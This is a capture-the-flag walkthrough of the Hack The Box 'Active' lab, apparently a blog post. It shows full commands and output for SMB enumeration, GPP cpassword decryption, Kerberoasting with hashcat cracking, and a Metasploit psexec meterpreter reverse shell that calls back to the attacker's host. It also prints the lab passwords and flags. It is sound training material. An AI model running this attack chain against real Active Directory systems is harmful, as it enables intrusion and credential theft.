Active
Port Scan Results ⤵️
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
┌──(kali㉿kali)-[~/Downloads/HTB/Active]
└─$ sudo nmap -sC -sV -p- -T4 -oN Nmap_results.txt 10.10.10.100
Starting Nmap 7.94 ( https:/nmap.org ) at 2023-08-07 14:43 IST
Nmap scan report for 10.10.10.100
Host is up (0.17s latency).
Not shown: 65512 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-08-07 09:21:08Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
49170/tcp open msrpc Microsoft Windows RPC
49171/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
SMB Enumeration ⤵️
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(kali㉿kali)-[~/Downloads/HTB/Active]
└─$ smbclient -L /10.10.10.100/
Password for [WORKGROUP\kali]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Lets get the SMB shares file system →
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(kali㉿kali)-[~/Downloads/HTB/Active]
└─$ smbclient -N \\\\10.10.10.100\\Replication
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
active.htb D 0 Sat Jul 21 16:07:44 2018
5217023 blocks of size 4096. 278613 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> ls
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
Groups.xml A 533 Thu Jul 19 02:16:06 2018
5217023 blocks of size 4096. 278613 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> more Group.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
Now I got credentials →
1
2
userName = "active.htb\SVC_TGS"
cpassword = "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
In the above SMB share we have seen the content of the Replication folder in which in this instance contains the same information regarding Group Policy that SYSVOL will have , and since it contains the Groups.xml
file which has cpassword
value so lets decrypt this key through gpp-decrypt
preinstalled tool in kali.
1
2
3
┌──(kali㉿kali)-[~/Downloads/HTB/Active]
└─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
Now I got the decrypted password as : GPPstillStandingStrong2k18
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
┌──(kali㉿kali)-[~/Downloads/HTB/Active]
└─$ smbclient \\\\10.10.10.100\\Users -U 'SVC_TGS'
Password for [WORKGROUP\SVC_TGS]:
Try "help" to get a list of possible commands.
smb: \> ls -al
NT_STATUS_NO_SUCH_FILE listing \-al
smb: \> ls
. DR 0 Sat Jul 21 20:09:20 2018
.. DR 0 Sat Jul 21 20:09:20 2018
Administrator D 0 Mon Jul 16 15:44:21 2018
All Users DHSrn 0 Tue Jul 14 10:36:44 2009
Default DHR 0 Tue Jul 14 12:08:21 2009
Default User DHSrn 0 Tue Jul 14 10:36:44 2009
desktop.ini AHS 174 Tue Jul 14 10:27:55 2009
Public DR 0 Tue Jul 14 10:27:55 2009
SVC_TGS D 0 Sat Jul 21 20:46:32 2018
5217023 blocks of size 4096. 278803 blocks available
smb: \> cd SVC_TGS\
smb: \SVC_TGS\> ls
. D 0 Sat Jul 21 20:46:32 2018
.. D 0 Sat Jul 21 20:46:32 2018
Contacts D 0 Sat Jul 21 20:44:11 2018
Desktop D 0 Sat Jul 21 20:44:42 2018
Downloads D 0 Sat Jul 21 20:44:23 2018
Favorites D 0 Sat Jul 21 20:44:44 2018
Links D 0 Sat Jul 21 20:44:57 2018
My Documents D 0 Sat Jul 21 20:45:03 2018
My Music D 0 Sat Jul 21 20:45:32 2018
My Pictures D 0 Sat Jul 21 20:45:43 2018
My Videos D 0 Sat Jul 21 20:45:53 2018
Saved Games D 0 Sat Jul 21 20:46:12 2018
Searches D 0 Sat Jul 21 20:46:24 2018
5217023 blocks of size 4096. 278803 blocks available
smb: \SVC_TGS\> cd Desktop
smb: \SVC_TGS\Desktop\> ls
. D 0 Sat Jul 21 20:44:42 2018
.. D 0 Sat Jul 21 20:44:42 2018
user.txt AR 34 Wed Aug 9 09:44:14 2023
5217023 blocks of size 4096. 278803 blocks available
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
I got users.txt
file →
1
c83e7e6adf44f7e0fef6f206da497b07
Now for Adminstrative Access I need to have enumerate Kerberos Tickets for that →
We can use Impacket is GetSPNusers.py
script to gather any Kerberos tickets.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(kali㉿kali)-[~/Downloads/HTB/Active]
└─$ locate GetUserSPNs.py
/usr/share/doc/python3-impacket/examples/GetUserSPNs.py
┌──(kali㉿kali)-[~/Downloads/HTB/Active]
└─$ cp /usr/share/doc/python3-impacket/examples/GetUserSPNs.py .
┌──(kali㉿kali)-[~/Downloads/HTB/Active]
└─$ python3 GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -k -request -dc-ip 10.10.10.100
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] CCache file is not found. Skipping...
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation]
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-19 00:36:40.351723 2023-08-09 09:44:25.256547
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$ee302fdc44d924c812d4dbf4951e55ea$7fff363327a1bb30080575162ddde50d0667e954bcdeac1c4eb7cc6b60dfbbb1e90fd767a4d8782bbed2df4535e8291c898a43df3a0604520d099b2dcca534cf81c149443dad09fc8d91dbbec4dfcbfd5e40fc0ac390c426c0f829e93a99a832c554fc5f13e6e6c82fd09e6f59ebe4962c8fa0f961609f218bf65bdf71d647ee3aee63d4bc0d1d3992ff82a80ede35480167e5bdfa7b80c874d89f5bae0ff939d2e94d681bebb14691e9a269a617fa1990bf0e623d0434f27c2d80a7fcf823b71ce0eed731ead6d175a77cfc8cb05e711461ebd010b05890350ca1aed881804391126aa752fa70bddd40f81dc20804dcd243fc0f52eab97cb4656d3eff6b8a6b01dbbb8c59a0f752da3ff0fccd885ea56d02d11fa415902094e07cb305ee93767e49f840467075037f9349850189aede15509d941253d2f0d7382a062c64728eee30ed608e6861af93f9e93ebacda4846f414f55cbf29dd03eed14311024b31c0ebf78687cde98658f7cb46ddf66514e665aa3a42d48201122d3642ab9851d10c7dbe5a0fe54280068e8345585ae6dec4b7eb58e8a21ef6c1c8b271a9af0f130fd0afbe32e9e577115aa71b083a72bb231d37c10688817256cd958a790d80a994071065c00e4b3a3a706ea86c255ad3e29c2f05cf9b34ae42d8f866ca113f88e6847016dd3176d6869fb971d53be88f34fa31b77fc4ba9b929f542ba57435038955fcf06e40ad57437645f67ee1a84031b05e76316f637568de086b3422f1748fa8c4b63876694c4674b57d5b1be6a6e08a13d69d226aa1448a102da2fe7dc95bd4647b54ba400b4d6b85284c1349ae2cc8649b683e092ed0199beae9b86b2a478ee4e1ce1b2c655fb22d631a3720ba2e8f7cdfd11a27327d9fffb7015c1172de1371606d930384e231a8da9a5d6cef86689d0d642c185bed89292ada9eef434b2a9608550976ca3c4da449a7228f64127d00e7ed144a05485f7680b20e79d8f1cb21a6bace1b648fb54017d76d9b00f25181bc1bcef368497cd1459e86ee2bc988d4c82fd2183c6f0c999a4543370e3b838a60bbc694feceda08a812091cfa18d7224276adb520c79c5af3d49b393a358c567c5427596d22f8bbda433b776b9b355f4fb4b6aed914dfff32402adc81a98c8a2e5c01d42e8fa7ed7eb6bd845f69e916c63da059f4e5fc3d6839d29ef7c6a3f8fac310ea8773a852e86bff3503dc1e8bff5010b6981369a49000e401ae34336f487e076846a9abe
Now Lets crack this Ticket value and get the password what I wanted →
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
┌──(kali㉿kali)-[~/Downloads/HTB/Active]
└─$ hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 3.1+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
...
...
* Create more work items to make use of your parallelization power:
https:/hashcat.net/faq/morework
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$acb5a62add6835d58aa8fd01c863930c$c2e917f5e50ca6fbae799bcf10ebbe580415dbd539d68d80ce3448b26311a4b3c4dd28fa006edfb9de58c05382f42646fdc4bc1c9a19bbc3b963145b8fe67054f67538e33d2f2e531ac642e1867be1d3e292657382bcd2addac9d9f29e7ddc8c515ddba055a06c4a6102032dddd446a4a5d23b07fcbbf7510b4caf13b032bfcfe6dbafb75bcdc908e6deffb6f78dadb49d087b7f8914f37f1433dc272065eab015d81d6220a883ad25179e2c07d0be3bacf832df1884b3ed046b279549c6af5798ed6abeb08b94dffaa8127c81fd2417633edf853edc541b58e9a1792b904cae05f3af11c9b73ebb018741edd5d20c88553cb7ca614995cfed81048e05f90f5666d428aef7692c02b091a519d4cabc499ecd6b025c9f5740f0d240e5959b58bf0da5e02d10d5ba508c19f493fa69d5b59a76b535b9d8da0ded57a1393bda790f2877a4517ceca6212371d2bb25fe48eda582c39d0dedf706ccd15fbdd76ceca8a0068f9d0ae567d845538170e1135270949672f52b3ca2f63951bb077d8c95f787320fe00cd4c912feef706f57bd73ec12497dc4a97fb3997cef20eb841333b3567322247dd7c0b8d31b1aa1f1726274b56b994a416d74bd1555ead7567c0b5e2e9127072ed8f0ca3bbbfb7ff8aa20c7a5e42da855c9b4a64fba54994fe6ad1183b7588a60d6113ce65b1f5a9072732239091ef2be3183c89ea8458a5aa3775605f1994e723e4b19a2b753b8bba8031209757bf39b11d7cd054b62c20e59e39eb863a91b37dadf1b38f66360da2230bcbc0bc37b8c1e4530e023d95eb771f96135b000b7da40182dc2a54b733e52f678476a8436a3b8489dc45407a731fd909be001119ea22c5293c19815756e425256fc8c012db0df4034486925e9ed927473eaed76bcedd7f1c576cb51eeebc7488908e7b11aae3603b2aa25c245e2b59381d531fef7db22c6daf3bba078cc7dc6f6dcd62079e619e79d66ef9997f21be30b0f4ceeabb42ad18182a8fb115a6d07885b164194921ee46e09a5e91c8f7ab07747902b62afc2ef868469d754a581ab9cc33b09ba6c7d3d7ac433c63e31c325caba3a915577ae64a7006e1c6de1e6697d516a4ba6e0a5c253e245077842401be5ca1823dae75c931c0f1a9948cb2ce9da623ab25fad00f10cc684c1a32dfa53069c6bea1452136f373398470220337f3ac25356f9851219938e42ea96ab4d4f8fc5e522fbd3a28f3735c2193297b1864973a468d728a8ae15e000:Ticketmaster1968
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...15e000
Time.Started.....: Wed Aug 9 13:31:15 2023 (18 secs)
Time.Estimated...: Wed Aug 9 13:31:33 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 561.8 kH/s (1.46ms) @ Accel:512 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10537984/14344385 (73.46%)
Rejected.........: 0/10537984 (0.00%)
Restore.Point....: 10536960/14344385 (73.46%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Tiffany95 -> ThruJasonK21
Hardware.Mon.#1..: Util: 77%
Started: Wed Aug 9 13:30:50 2023
Stopped: Wed Aug 9 13:31:34 2023
Now I got the password : Ticketmaster1968
, lets get into the shell using these credentials through metasploit →
Now lets use this module named as smb/psexec for the shell →
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
msf6 exploit(windows/smb/psexec) > options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.10.100 yes The target host(s), see https:/docs.metasploit.com/docs/using-metasploit
/basics/using-metasploit.html
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain active.htb no The Windows domain to use for authentication
SMBPass Ticketmaster1968 no The password for the specified username
SMBSHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) or a norma
l read/write folder share
SMBUser Administrator no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.94 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/psexec) >
Now it time for exploit ⤵️
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
msf6 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 10.10.14.94:4444
[*] 10.10.10.100:445 - Connecting to the server...
[*] 10.10.10.100:445 - Authenticating to 10.10.10.100:445|active.htb as user 'Administrator'...
[*] 10.10.10.100:445 - Selecting PowerShell target
[*] 10.10.10.100:445 - Executing the payload...
[+] 10.10.10.100:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 10.10.10.100
[*] Meterpreter session 1 opened (10.10.14.94:4444 -> 10.10.10.100:49896) at 2023-08-09 13:36:47 +0530
meterpreter > sysinfo
Computer : DC
OS : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : el_GR
Domain : ACTIVE
Logged On Users : 1
Meterpreter : x86/windows
meterpreter >
meterpreter > pwd
C:\Windows\system32
meterpreter > cd ../../
meterpreter > dir
Listing: C:\
============
Mode Size Type Last modified Name]
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2009-07-14 08:04:39 +0530 $Recycle.Bin
040777/rwxrwxrwx 0 dir 2009-07-14 10:36:44 +0530 Documents and Settings
040777/rwxrwxrwx 0 dir 2009-07-14 08:50:08 +0530 PerfLogs
040555/r-xr-xr-x 4096 dir 2022-01-12 18:41:58 +0530 Program Files
040555/r-xr-xr-x 4096 dir 2021-01-21 22:19:16 +0530 Program Files (x86)
040777/rwxrwxrwx 4096 dir 2022-01-12 18:39:27 +0530 ProgramData
040777/rwxrwxrwx 0 dir 2018-07-16 15:43:22 +0530 Recovery
040777/rwxrwxrwx 4096 dir 2018-07-19 00:15:01 +0530 System Volume Information
040555/r-xr-xr-x 4096 dir 2018-07-21 20:09:20 +0530 Users
040777/rwxrwxrwx 16384 dir 2023-08-09 10:31:43 +0530 Windows
000000/--------- 0 fif 1970-01-01 05:30:00 +0530 pagefile.sys
meterpreter > cd Users
meterpreter > dir
Listing: C:\Users
=================
Mode Size Type Last modified Name]
---- ---- ---- ------------- ----
040777/rwxrwxrwx 8192 dir 2018-07-16 15:44:21 +0530 Administrator
040777/rwxrwxrwx 0 dir 2009-07-14 10:36:44 +0530 All Users
040555/r-xr-xr-x 8192 dir 2009-07-14 12:08:21 +0530 Default
040777/rwxrwxrwx 0 dir 2009-07-14 10:36:44 +0530 Default User
040555/r-xr-xr-x 4096 dir 2009-07-14 10:27:55 +0530 Public
040777/rwxrwxrwx 4096 dir 2018-07-21 20:46:32 +0530 SVC_TGS
100666/rw-rw-rw- 174 fil 2009-07-14 10:27:55 +0530 desktop.ini
meterpreter > cd Administrator\\
meterpreter > ls
Listing: C:\Users\Administrator
===============================
Mode Size Type Last modified Name]
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2018-07-16 15:44:15 +0530 AppData
040777/rwxrwxrwx 0 dir 2018-07-16 15:44:15 +0530 Application Data
040555/r-xr-xr-x 0 dir 2018-07-30 19:20:10 +0530 Contacts
040777/rwxrwxrwx 0 dir 2018-07-16 15:44:15 +0530 Cookies
040555/r-xr-xr-x 0 dir 2021-01-21 22:19:47 +0530 Desktop
040555/r-xr-xr-x 4096 dir 2018-07-30 19:20:10 +0530 Documents
040555/r-xr-xr-x 0 dir 2021-01-21 22:22:32 +0530 Downloads
040555/r-xr-xr-x 0 dir 2018-07-30 19:20:10 +0530 Favorites
040555/r-xr-xr-x 0 dir 2018-07-30 19:20:10 +0530 Links
040777/rwxrwxrwx 0 dir 2018-07-16 15:44:15 +0530 Local Settings
040555/r-xr-xr-x 0 dir 2018-07-30 19:20:10 +0530 Music
040777/rwxrwxrwx 0 dir 2018-07-16 15:44:15 +0530 My Documents
100666/rw-rw-rw- 524288 fil 2023-08-09 09:44:25 +0530 NTUSER.DAT
100666/rw-rw-rw- 65536 fil 2018-07-16 15:44:15 +0530 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw- 524288 fil 2018-07-16 15:44:15 +0530 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer0000000
0000000000001.regtrans-ms
100666/rw-rw-rw- 524288 fil 2018-07-16 15:44:15 +0530 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer0000000
0000000000002.regtrans-ms
040777/rwxrwxrwx 0 dir 2018-07-16 15:44:15 +0530 NetHood
040555/r-xr-xr-x 0 dir 2018-07-30 19:20:10 +0530 Pictures
040777/rwxrwxrwx 0 dir 2018-07-16 15:44:15 +0530 PrintHood
040777/rwxrwxrwx 0 dir 2018-07-16 15:44:15 +0530 Recent
040555/r-xr-xr-x 0 dir 2018-07-30 19:20:10 +0530 Saved Games
040555/r-xr-xr-x 0 dir 2018-07-30 19:20:10 +0530 Searches
040777/rwxrwxrwx 0 dir 2018-07-16 15:44:15 +0530 SendTo
040777/rwxrwxrwx 0 dir 2018-07-16 15:44:15 +0530 Start Menu
040777/rwxrwxrwx 0 dir 2018-07-16 15:44:15 +0530 Templates
040555/r-xr-xr-x 0 dir 2018-07-30 19:20:10 +0530 Videos
100666/rw-rw-rw- 262144 fil 2023-08-09 10:31:43 +0530 ntuser.dat.LOG1
100666/rw-rw-rw- 0 fil 2018-07-16 15:44:09 +0530 ntuser.dat.LOG2
100666/rw-rw-rw- 20 fil 2018-07-16 15:44:15 +0530 ntuser.ini
meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Users\Administrator\Desktop
=======================================
Mode Size Type Last modified Name]
---- ---- ---- ------------- ----
100666/rw-rw-rw- 282 fil 2018-07-30 19:20:10 +0530 desktop.ini
100444/r--r--r-- 34 fil 2023-08-09 09:44:14 +0530 root.txt
meterpreter > cat root.txt
c8a0d7e6349f05d8b41db241dfeb84ff
meterpreter >
meterpreter > shell
Process 2848 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\Administrator\Desktop>whoami
whoami
nt authority\system
If you have any questions or suggestions, please leave a comment below. Thank You !